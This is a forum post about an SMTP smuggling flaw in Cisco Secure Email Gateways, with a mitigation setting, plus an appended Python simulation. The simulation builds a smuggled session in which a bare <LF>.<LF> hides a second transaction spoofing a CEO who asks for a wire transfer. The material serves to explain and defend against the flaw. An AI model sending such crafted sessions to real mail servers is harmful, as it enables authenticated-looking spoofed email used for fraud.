Cisco Cisco Secure Email (Cloud) Gateway vulnerable to SMTP smuggling

filiadata
Level 1

Full read: https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/

In short, the end-of-data command in SMTP is specified as a dot surrounded by carriage return and line feed: <CR><LF>.<CR><LF>. However, the Cisco Secure Email Gateways apparently also treat <CR>.<CR> or <LF>.<LF> as end-of-data and automatically try to "repair" those line breaks by converting them into <CR><LF>. This allows a sender to craft a special email message which is suddenly split into multiple messages as soon as it traverses a Cisco Secure Email Gateway. The contents of all parts of the message are controlled by the sender and are successfully authenticated by the sending MTA. To sum it up, this allows attackers to create email messages from all kinds of foreign domains which the Cisco Secure Email Gateway and all subsequent email servers will see as successfully DMARC authenticated, although they are actually completely fake.

Unfortunately it seems Cisco is the only vendor that treats this behaviour as a feature and not a bug, so all customers of both on-premise Ironport and Cisco Cloud Email Security need to take action by themselves and manually disable the fixup of line breaks on their systems under "Network > Listeners > Select the inbound listener > CR and LF Handling". Make sure any option EXCEPT the default "Clean messages" is selected.
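Added example (not part of filiadata's post, and not Cisco's code): a small Python model of a receiving MTA's command/DATA handling that shows the split the post describes. One constructed SMTP session carries a single, correctly terminated DATA payload that contains a bare <LF>.<LF> in the middle. A receiver that only honours <CR><LF>.<CR><LF> sees one message; a receiver that first "repairs" bare <CR>/<LF> into <CR><LF> (modelled here by a simple regex, an assumption about how the fixup behaves) ends DATA early and parses the rest as a second transaction with an attacker-chosen envelope. All domain names and addresses are made up.

```python
import re

CRLF = b"\r\n"

# Constructed sample session (not a real capture). One legitimate transaction
# whose DATA payload hides a bare <LF>.<LF> followed by a second, attacker-
# controlled MAIL FROM / RCPT TO / DATA. The ONLY RFC 5321 terminator is the
# final <CR><LF>.<CR><LF>.
SMUGGLED_SESSION = (
    b"MAIL FROM:<attacker@sender.example>\r\n"
    b"RCPT TO:<victim@target.example>\r\n"
    b"DATA\r\n"
    b"From: attacker@sender.example\r\n"
    b"To: victim@target.example\r\n"
    b"Subject: harmless looking message\r\n"
    b"\r\n"
    b"This is the visible message body.\r\n"
    b"\n.\n"                                  # <LF>.<LF>: not a valid end-of-data
    b"MAIL FROM:<ceo@spoofed.example>\r\n"    # smuggled second transaction
    b"RCPT TO:<finance@target.example>\r\n"
    b"DATA\r\n"
    b"From: ceo@spoofed.example\r\n"
    b"To: finance@target.example\r\n"
    b"Subject: urgent wire transfer\r\n"
    b"\r\n"
    b"Please pay the attached invoice today.\r\n"
    b".\r\n"                                  # the real terminator
    b"QUIT\r\n"
)


def repair_bare_line_breaks(stream: bytes) -> bytes:
    """Assumed model of a 'clean up line breaks' fixup: every bare <CR> or <LF>
    becomes <CR><LF>; existing <CR><LF> pairs are left alone."""
    return re.sub(rb"\r\n|\r|\n", CRLF, stream)


def _address(line: bytes) -> str:
    """Pull the address out of 'MAIL FROM:<a@b>' / 'RCPT TO:<a@b>'."""
    return line[line.index(b"<") + 1:line.index(b">")].decode()


def parse_session(stream: bytes, repair: bool) -> list[dict]:
    """Minimal receiving-side SMTP state machine over an already-received byte
    stream. Lines are delimited by <CR><LF> only, and DATA ends at a line that
    is exactly '.', i.e. at <CR><LF>.<CR><LF>. With repair=True the stream is
    normalised first, so a bare <LF>.<LF> or <CR>.<CR> also ends DATA.
    Returns one dict per completed message transaction."""
    if repair:
        stream = repair_bare_line_breaks(stream)

    messages: list[dict] = []
    current = None
    in_data = False

    for line in stream.split(CRLF):
        if in_data:
            if line == b".":
                in_data = False
                messages.append(current)
                current = None
            else:
                # transparency (dot-unstuffing) per RFC 5321 section 4.5.2
                current["body"].append(line[1:] if line.startswith(b".") else line)
            continue

        verb = line.split(b":", 1)[0].upper()
        if verb == b"MAIL FROM":
            current = {"mail_from": _address(line), "rcpt_to": [], "body": []}
        elif verb == b"RCPT TO" and current is not None:
            current["rcpt_to"].append(_address(line))
        elif verb == b"DATA" and current is not None:
            in_data = True
        # QUIT, empty trailing element and anything else: ignored in this model

    return messages


if __name__ == "__main__":
    for mode in (False, True):
        msgs = parse_session(SMUGGLED_SESSION, repair=mode)
        print(f"repair={mode}: {len(msgs)} message(s)")
        for m in msgs:
            print(f"  MAIL FROM {m['mail_from']} -> {m['rcpt_to']}, "
                  f"{len(m['body'])} body lines")
```

Run as-is, the strict parse yields one message whose body merely contains the text "MAIL FROM:<ceo@spoofed.example>", while the repairing parse yields two messages, the second with envelope sender ceo@spoofed.example, even though the sending server only ever authenticated a single transaction from sender.example. Whether a real Cisco listener behaves exactly like the regex above is not something this model can show; it only illustrates why the "Clean messages" fixup described in the post is the dangerous part.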
